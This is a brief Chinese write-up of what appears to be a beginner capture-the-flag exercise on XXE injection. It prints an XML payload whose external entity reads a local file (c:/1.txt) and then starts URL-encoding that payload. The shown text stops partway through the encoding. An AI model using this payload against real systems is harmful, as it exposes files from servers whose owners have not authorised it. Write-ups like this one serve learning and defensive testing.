一、xxe注入
这道题应该是XXE漏洞最基础的任意文件读取
打开是一个输入框
在C盘构造一个flag。别问我为啥,为也不知道
bp抓个包
随便输入个什么都有回显,应该是基础的XXE注入
这是一段读取文件的xml
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY B SYSTEM "file:///c:/1.txt">
]>
<xml>
<xxe>&B;</xxe>
</xml>
由于存在换行,所以转化为URL编码:%3C%3F%78%6D%6C%20%76%65%72%73%69%6F%6E%3D%22%31%2E%30%22%3F%3E%0D%0A%3C%21%44%4F%